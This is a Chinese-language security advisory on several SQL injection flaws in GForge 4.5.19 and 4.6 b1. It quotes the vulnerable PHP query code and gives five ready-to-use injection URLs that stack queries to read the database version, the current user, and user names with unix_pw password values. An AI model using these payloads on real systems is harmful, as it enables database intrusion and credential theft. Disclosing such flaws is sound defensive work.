安全研究

安全漏洞
GForge多个SQL注入漏洞

发布日期:2008-10-09
更新日期:2009-02-20

受影响系统:
GForge GForge 4.6 b1
GForge GForge 4.5.19
描述:
BUGTRAQ  ID: 31674
CVE(CAN) ID: CVE-2008-6187,CVE-2008-6188,CVE-2008-6189

GForge是用于管理软件开发周期的工具。

GForge的new/index.php、news/index.php和top/topusers.php文件没有正确地过滤offset输入参数:

function db_query($qstring,$limit='-1',$offset=0) {
    global $QUERY_COUNT;
    $QUERY_COUNT++;

    if ($limit > 0) {
        if (!$offset || $offset < 0) {
            $offset=0;
        }
        $qstring=$qstring." LIMIT $limit OFFSET $offset";
    }

    if ($GLOBALS['IS_DEBUG'])
        $GLOBALS['G_DEBUGQUERY'] .= $qstring . "<p><br />\n";
    global $conn;
    return @pg_exec($conn,$qstring);
}

people/editprofile.php文件没有正确的过滤skill_edit[]输入参数:

    $SQL = "select * from skills_data where skills_data_id
in(".$skill_ids[0];
    for($i = 1; $i < $numSkills; $i++) {
        $SQL .= ", ".$skill_ids[$i];
    }
    $SQL .= ")";
        $result=db_query($SQL);

frs/shownotes.php文件没有正确过滤release_id输入参数:

$result=db_query("SELECT frs_release.notes,frs_release.changes,
        frs_release.preformatted,frs_release.name,frs_package.group_id,frs_package.is_public
        FROM frs_release,frs_package
        WHERE frs_release.package_id=frs_package.package_id
        $pub_sql
        AND frs_release.release_id='$release_id'");

远程攻击者可以通过提交恶意的SQL查询请求执行SQL注入攻击。

<*来源:Fernando Mu&ntilde;oz
  
  链接:http://secunia.com/advisories/32217/
        http://gforge.org/gf/project/gforge/tracker/?action=TrackerItemEdit&tracker_item_id=5554
        http://gforge.org/gf/project/gforge/tracker/?action=TrackerItemEdit&tracker_item_id=5553
        http://gforge.org/gf/project/gforge/tracker/?action=TrackerItemEdit&tracker_item_id=5552
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/new/?group_id=&amp;limit=50&amp;offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
http://www.example.com/news/?group_id=&amp;limit=50&amp;offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
http://www.example.com/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;
http://www.example.com/frs/shownotes.php?release_id=*/+--+454&amp;pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*
http://www.example.com/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&amp;MultiEdit=Edit

建议:
厂商补丁:

GForge
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://gforge.org/

浏览次数:2401
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客